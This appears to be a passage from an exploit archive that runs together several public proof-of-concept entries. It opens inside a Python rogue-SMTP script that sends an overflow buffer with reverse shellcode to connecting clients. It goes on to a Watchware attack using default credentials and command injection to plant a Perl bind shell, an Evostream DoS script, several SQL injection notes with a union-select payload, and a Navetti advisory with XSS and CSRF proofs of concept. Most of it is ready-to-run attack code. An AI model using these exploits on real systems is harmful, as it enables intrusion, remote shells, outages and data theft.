"\x61\x86\xef\xfc\x65\x96\x46\x4e\xa6\xce\xb7\x1e\xfe\x1c\xde"
"\x07\xce\xad\xde\x94\x19\x1c\x96\xc9\x1c\x68\x3b\xde\xe2\x9a"
"\x96\xd8\x15\x77\xe2\xe9\x2e\xea\x6f\x24\x50\xb3\xe2\xfb\x75"
"\x1c\xcf\x3b\x2c\x44\xf1\x94\x21\xdc\x1c\x47\x31\x96\x44\x94"
"\x29\x1c\x96\xcf\xa4\xd3\xb3\x3b\x76\xcc\xf6\x46\x77\xc6\x68"
"\xff\x72\xc8\xcd\x94\x3f\x7c\x1a\x42\x45\xa4\xa5\x1f\x2d\xff"
"\xe0\x6c\x1f\xc8\xc3\x77\x61\xe0\xb1\x18\xd2\x42\x2f\x8f\x2c"
"\x97\x97\x36\xe9\xc3\xc7\x77\x04\x17\xfc\x1f\xd2\x42\xfd\x1a"
"\x45\x57\x3f\xd9\xad\xff\x95\x1f\x3c\xcb\x1e\xf9\x7d\xc7\xc7"
"\x4f\x6d\xc7\xd7\x4f\x45\x7d\x98\xc0\xcd\x68\x42\x88\x47\x87"
"\xc1\x48\x45\x0e\x32\x6b\x4c")


rev_met_2=("\x68\x42\x9a\xed\xe3\x9b\xe0\x63"
"\x9f\xe2\xf3\x45\x67\x22\xbd\x7b\x68\x42\x75\x2d\xfd\x93\x49"
"\x7a\xff\x95\xc6\xe5\xc8\x68\xca\xa6\xa1\xfd\x5f\x45\x97\x87"
"\x1f\x2d\xc1\xfd\x1f\x45\xcf\x33\x4c\xc8\x68\x42\x8c\x7e\xfd"
"\x97\x49\x7e\xc0\xff\x1d\xf4\x5f\xc8\xe0\xf8\x96\x54\x36\xeb"
"\xe2\x79\xdc\x2d\x97\x97")


buffer = "A"*176+rev_met_2+"A"*2+jmp+"B"*12+nops+rev_met_1
port = 25
s = socket.socket()
ip = '0.0.0.0'             
s.bind((ip, port))            
s.listen(5)                    

 
print 'Listening on SMTP port: '+str(port)
if len(rev_met_1) >= 236:
	print('[!] Shellcode part 1 is too long ('+str(len(rev_met_1))+'). Exiting.')
	exit(1) 
elif len(rev_met_2) >= 76:
	print('[!] Shellcode part 2 is too long('+str(len(rev_met_2))+'). Exiting.')
	exit(1)
 
while True:
	conn, addr = s.accept()     
	conn.send('220 '+buffer+'\r\n')
	conn.close()
HireHackking 
Bull Clusterwatch/Watchware is a VERY VERY OLD tool used by sysadmins to manage their AIX clusters.

Marble effect in the web banner and questionable font: it smells the 90s !

Tool is mainly a web app with CGIs (shell scripts and binaries) and we have found three vulnerabilities in it:

Trivial admin credentials
Authenticated user can write on the system file
Authenticated user can inject OS commands
By combining these three vulnerabilities an attacker can fully compromise servers running Watchware.

We tried to contact Bull to report this more than one year ago without any success, but the devs are probably retired now so that doesn’t matter, let’s do some archeology alone.

Here are the details:


1. Trivial creds: smwadmin/bullsmw

2. Authenticated user can write on the system file

A page allows sysadmins to customize a few things including filters that are used in the process listing page (the tool allows you to list your running processes).

But these filters are written on disk and you can call them using the following OS command injection.

Request to write the shellcode:

http://host:9696/clw/cgi-bin/adm/bclw_updatefile.cgi?cluster=clustername&node=nodename&alarm=%0D%0Aswap_adapter%0D%0Anode_down%0D%0Anode_up%0D%0Anetwork_down%0D%0Anetwork_up%0D%0Astate%0D%0Ahacmp%0D%0Astop%0D%0Aaix%0D%0A&day=1%0D%0A2%0D%0A3%0D%0A4%0D%0A5%0D%0A6%0D%0A7%0D%0A8%0D%0A15%0D%0A30%0D%0A45%0D%0A0%0D%0A&hour=0%0D%0A1%0D%0A2%0D%0A3%0D%0A4%0D%0A5%0D%0A6%0D%0A12%0D%0A18%0D%0A23%0D%0A&proc=perl%20-e%20'use%20Socket;$p=2222;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p,%20INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close%20C){open(STDIN,">%26C");open(STDOUT,">%26C");open(STDERR,">%26C");exec("/bin/ksh%20-i");};'%0D%0A%0D%0A&lpp=%0D%0Acluster%0D%0A&refr=0%0D%0A

The shellcode we used:

perl -e 'use Socket;$p=2223;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));bind(S,sockaddr_in($p, INADDR_ANY));listen(S,SOMAXCONN);for(;$p=accept(C,S);close C){open(STDIN,">&C");open(STDOUT,">&C");open(STDERR,">&C");exec("/bin/ksh -i");};'

3. Authenticated user can inject OS commands

When listing the processes you can apply a filter… and inject a single command using backticks, great !

Very useful to execute our shellcode which was stored in a single file (the filter).

Request to execute the shellcode:

http://host:9696/clw/cgi-bin/adm/bclw_stproc.cgi?cluster=clustername&node=nodename&proc_filter=smw`/usr/sbin/bullcluster/monitoring/clw/web/conf/proc_filter.txt`"
HireHackking 
# Exploit Title: Evostream Media Server 1.7.1 – Built-in Webserver DoS
# Date: 2017-03-07
# Exploit Author: Peter Baris
# Vendor Homepage: http://www.saptech-erp.com.au
# Software Link: https://evostream.com/software-downloads/
# Version: 1.7.1
# Tested on: Windows Server 2008 R2 Standard x64
# CVE : CVE-2017-6427

# 2017-03-02: Vulnerability reported
# 2017-03-03: Software vendor answered, vulnerability details shared
# 2017-03-07: No answer, publishing

import socket
import sys

try:
    host = sys.argv[1]
    port = 8080
except IndexError:
    print "[+] Usage %s <host>  " % sys.argv[0]
    sys.exit()



buffer = "GET /index.html HTTP/1.1\r\n"
buffer+= "Host: "+host+":"+str(port)+"\r\n"
buffer+= "User-Agent: Mozilla/5.0 (X11; Linux i686; rv:44.0) Gecko/20100101 Firefox/44.0 Iceweasel/44.0.2\r\n"
buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\
r\n"
buffer+="Accept-Language: en-US,en;q=0.5\r\n"
buffer+="Accept-Encoding: gzip, deflate\r\n"
buffer+="Referer: http://192.168.198.129/login"
buffer+="Connection: keep-alive\r\n"
buffer+="Cont"+"\x41"*8+":\r\napplication/x-www-form-urlencoded\r\n"   # RCX Control
#buffer+="\xff\xad\xde"+"\x41"*8+":\r\napplication/x-www-form-urlencoded\r\n" # Remove hash to control RDX and CX(it will have the value 0x000000000000dead)
buffer+="Content-Length: 5900\r\n\r\n"
buffer+="B"*4096 # This is just to prove that the stack will also contain any buffer delivered with the malicios HTTP header
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((host,port))
s.send(buffer)
s.close()
HireHackking 
# # # # # 
# Exploit Title: Themeforest Clone Script - SQL Injection
# Google Dork: N/A
# Date: 08.03.2017
# Vendor Homepage: http://bsetec.com/
# Software : http://themeforestclone.bsetec.com/
# Demo: http://www.bsetecdemo.com/marketplus/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/LastAdded/?by=[SQL]
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Graphicriver Clone Script - SQL Injection
# Google Dork: N/A
# Date: 08.03.2017
# Vendor Homepage: http://bsetec.com/
# Software : http://graphicriverclone.bsetec.com/
# Demo: http://www.bsetecdemo.com/graphicriverclone/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/LastAdded/?by=[SQL]
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Codecanyon Clone Script - SQL Injection
# Google Dork: N/A
# Date: 08.03.2017
# Vendor Homepage: http://bsetec.com/
# Software : http://codecanyonclone.bsetec.com/
# Demo: http://www.bsetecdemo.com/codecanyonclone/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/LastAdded/?by=[SQL]
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Audiojungle Clone Script - SQL Injection
# Google Dork: N/A
# Date: 08.03.2017
# Vendor Homepage: http://bsetec.com/
# Software : http://audiojungleclone.bsetec.com/
# Demo: http://www.bsetecdemo.com/audiojungleclone
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/LastAdded/?by=[SQL]
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Videohive Clone Script - SQL Injection
# Google Dork: N/A
# Date: 08.03.2017
# Vendor Homepage: http://bsetec.com/
# Software : http://videohiveclone.bsetec.com/
# Demo: http://www.bsetecdemo.com/videohiveclone/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/LastAdded/?by=[SQL]
# # # # #
HireHackking 
<!--
SEC Consult Vulnerability Lab Security Advisory < 20170308-0 >
=======================================================================
              title: Multiple vulnerabilities
            product: Navetti PricePoint
 vulnerable version: 4.6.0.0
      fixed version: 4.7.0.0 or higher
         CVE number: -
             impact: high/critical
           homepage: http://www.navetti.com/
              found: 2016-07-18
                 by: W. Schober (Office Vienna)
                     SEC Consult Vulnerability Lab

                     An integrated part of SEC Consult
                     Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
                     Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

                     https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Navetti PricePoint is the ultimate business tool for controlling, managing and
measuring all aspects of your pricing. Our clients have been able to increase
their revenue and profitability substantially, implement market- and value-based
pricing, increase customer trust and implement a common business language
throughout their organization. In addition, with Navetti PricePoint our clients
are able to implement governance processes, manage risk and ensure organization
compliance, and attain business sustainability."

Source:
http://www.navetti.com/our-expertise/navetti-pricepoint/


Business recommendation:
------------------------
During a quick security check, SEC Consult identified four vulnerabilities,
which are partially critical. As the time frame of the test was limited, it is
suspected that there are more vulnerabilities in the application.

It is highly recommended by SEC Consult to apply the patch resolving the
identified vulnerabilities before using Navetti PricePoint in an environment
with potential attackers.


Vulnerability overview/description:
-----------------------------------
1) SQL Injection (Blind boolean based)
Navetti PricePoint is prone to SQL injection attacks. The attacks can be
executed by all privilege levels, ranging from the lowest privileged users to
the highest privileged users.

By exploiting this vulnerability, an attacker gains access to all records
stored in the database with the privileges of the database user.

2) Multiple persistent cross site scripting vulnerabilities
The web application suffers from multiple persistent cross site scripting issues.
Low privileged users as well as high privileged users, are able to inject
malicious JavaScript payloads persistently in the application. This
vulnerability is even more critical, because it can be used by a low privileged
user who wants to elevate his privileges. The low privileged attacker can
place a payload which creates a new superuser, or add his own account to the
superuser group. If a superuser logs in to the application, the JavaScript
payload is executed with the rights of the superuser and the new user is
created or added to the superuser group.

3) Multiple reflected cross site scripting vulnerabilities
Navetti PricePoint suffers from multiple reflected cross site scripting issues.
The code which is used to generate error messages inside of the application,
does not correctly escape/sanitize user input. Due to that all error messages
containing user input are prone to reflected cross site scripting attacks.
Furthermore the file upload dialog does not correctly sanitize the file name of
uploaded files. If a file name contains a JavaScript payload, it is executed in
the file upload dialog.

4) Cross Site Request Forgery
Navetti PricePoint doesn't implement any kind of cross site request forgery
protection. Attackers are able to execute arbitrary requests with the privileges
of any user. The only requirement is, that the victim clicks on a malicious
link. For example an administrator can be forced to execute unwanted actions.
Some of these actions are:

  -) Add users
  -) Delete users
  -) Add users to an arbitrary role
  -) Change internal settings of the application


Proof of concept:
-----------------
1) SQL Injection (Blind boolean based)
The search function in the tree structure, which displays various groups, does
not properly validate user input, allowing an attacker with any privilege level
to  inject arbitrary SQL commands and read the contents of the whole database.

The following URL could be used to perform blind SQL injection attacks:
-) URL: /NBN.Host/PMWorkspace/PMWorkspace/FamilieTreeSearch
  (Parameter: searchString, Type: GET)

2) Multiple persistent cross site scripting vulnerabilities
The following URL parameters have been identified to be vulnerable against
persistent cross site scripting:

-) URL: /NBN.Host/Component/Competitors/AddEdit (Parameter: name,POST)
-) URL: /NBN.Host/Component/ItemSearchGrid/EditData (Parameter: Quality105,POST)
-) URL: /NBN.Host/component/GroupInfo/SaveGroup (Parameter: name,POST)

The proof of concept shows just selected examples of cross-site scripting
vulnerabilities. Based on the conducted tests, SEC Consult identified that
proper input validation is lacking.
Due to the limited time frame of the test, it was not possible to verify every
single parameter of the application. Therefore, it can be assumed, that there
are similar flaws in other parts of the web application.

3) Multiple reflected cross site scripting vulnerabilities
The application is also prone to reflected cross site scripting attacks. The
vulnerabilities were observed in at least two main parts of the application.
Those two parts are error messages and the file upload functionality.

-) Error Messages
    Every user input which is reflected in error messages, is not correctly
    escaped and injection of malicious JavaScript code is possible.

-) File uploads
    The file upload functionality is not correctly escaping the filename of
    uploaded files. If a victim is forced to upload a special crafted file, an
    arbitrary JavaScript payload can be triggered and executed in the victim's
    context. An example for a working, but very obvious payload in the filename
    would be the following example:

    -) <img src=x onerror=alert(document.cookies)>.xlsx

4) Cross Site Request Forgery
The application is prone to cross site request forgery attacks because no
measures such as CSRF tokens or nounces, are in place. The following proof of
concept deletes the user account
with ID 18:
-->

<html>
<body>
 <script>
    function submitRequest()
    {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "https://($IP|$Domain)/NBN.Host/PermissionsManagement/
        PermissionsManagement/DeleteUsers", true);
        xhr.setRequestHeader("Accept", "*/*");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "text/plain");
        xhr.withCredentials = true;
        var body = "{\"DeleteAll\":false,\"UserIDs\":[\"18\"]}";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
                aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
    }
</script>
<form action="#">
 <input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>

<!--
If a victim visits a website, which is hosted by an attacker, the script above
would be executed and the user with the userID 18 would be deleted. Due to the
complete absence of measures against cross site request forgery, it can be
assumed that the application is vulnerable for this
kind of attack.


Vulnerable / tested versions:
-----------------------------
SEC Consult tested Navetti PricePoint 4.6.0.0.
This version was the latest version at the time of the discovery.


Vendor contact timeline:
------------------------
2016-07-27: Contacting vendor through info@navetti.com
2016-07-27: Vendor provided a technical contact who is responsible for
            vulnerability coordination, furthermore clear-text communication
            was requested.
2016-07-27: Providing advisory and proof of concept through insecure channel
            as requested.
2016-08-05: Navetti provided a status update concerning a new version of
            Navetti Price Point. The release date of the version, where all
            the vulnerabilities are fixed, will be provided soon
2016-08-11: Navetti sent an update containing their upcoming release schedule.
            The update of Navetti Price Point, which should fix all the
            vulnerabilities, will be released on 2016-10-01.
2016-10-01: Patch available
2017-03-08: SEC Consult releases security advisory


Solution:
---------
Update to the latest version available. According to Navetti, all the
vulnerabilities are fixed in release 4.7.0.0.

According to the vendor, they have further improved their software security
since our initial contact.


Workaround:
-----------
No workaround available


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow
Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/Career.htm

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/About/Contact.htm
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF W. Schober / @2017
-->
HireHackking 
# # # # # 
# Exploit Title: Envato Clone Script - SQL Injection
# Google Dork: N/A
# Date: 08.03.2017
# Vendor Homepage: http://bsetec.com/
# Software : http://envatoclone.bsetec.com/
# Demo: http://bsetecdemo.com/envatoclone/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/codes/php-scripts/?by=[SQL]
# http://localhost/[PATH]/graphics/graphics/?by=[SQL]
# http://localhost/[PATH]/themes/word-press/?by=[SQL]
# http://localhost/[PATH]/audios/music/?by=[SQL]
# # # # #
HireHackking 
# # # # # 
# Exploit Title: Country on Sale Script - SQL Injection
# Google Dork: N/A
# Date: 09.03.2017
# Vendor Homepage: http://www.websitescripts.org/
# Software: http://www.websitescripts.org/website-scripts/country-on-sale-script/prod_53.html
# Demo: http://www.websitescripts.org/demo/countryonsalescript/
# Version: N/A
# Tested on: Win7 x64, Kali Linux x64
# # # # # 
# Exploit Author: Ihsan Sencan
# Author Web: http://ihsan.net
# Author Mail : ihsan[@]ihsan[.]net
# # # # #
# SQL Injection/Exploit :
# http://localhost/[PATH]/read_more.php?newsid=[SQL]
# http://localhost/[PATH]/countries/index.php?id=[SQL]
# 13'+/*!50000union*/+select+1,version(),0x496873616e2053656e63616e3c62723e7777772e696873616e2e6e6574,4,5--+-
# Etc..
# # # # #